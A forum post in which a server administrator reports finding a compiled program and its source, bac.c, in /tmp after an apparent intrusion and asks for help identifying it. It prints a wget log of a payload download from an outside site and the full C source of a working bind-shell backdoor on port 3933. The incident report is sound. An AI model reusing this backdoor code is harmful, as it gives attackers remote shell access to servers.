bac.c exploit dropped in /tmp directory

Somebody I know just found some unusal .c files sitting in his /tmp directory as of this morning. Its an Ensim box. Im wondering if this Vuln has anything to do with the mod_ssl exploit that Cpanel claims is currently in 2.8.12

In tmp we see two files.

bac.c and
bac <------ the compiled C program.

Some remote buffer overflow program!

Seems like it dials out on define PORT 3933

Then it connect to a site, however this did not work very well. It probably tried to download some files from this site but that didnt work.The box seems to be rootkit free at this time.

Some Russian site. Cant read a bloody word of it!

--07:49:59-- http://mworxnow.com/bac.txt
=> `/tmp//bac.txt'
Connecting to mworxnow.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,366 [text/plain]

0K . 100% @ 1.30 MB/s

07:50:00 (1.30 MB/s) - `/tmp//bac.txt' saved [1366/1366]

/tmp/bac.txt: file not recognized: File format not recognized
collect2: ld returned 1 exit status
gcc: No input files
/tmp/bac.c:50:1: warning: no newline at end of file

Could this be the new mod_ssl exploit the Cpanel recommends we upgrade from?

and..... APACHE IS DEAD IN THE WATER

After killing the bac proccess Apache came to life.

Can anyone of you 'C' guru's identify this program?

bac.c

#define PORT 3933
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}

 

 

 

 

Top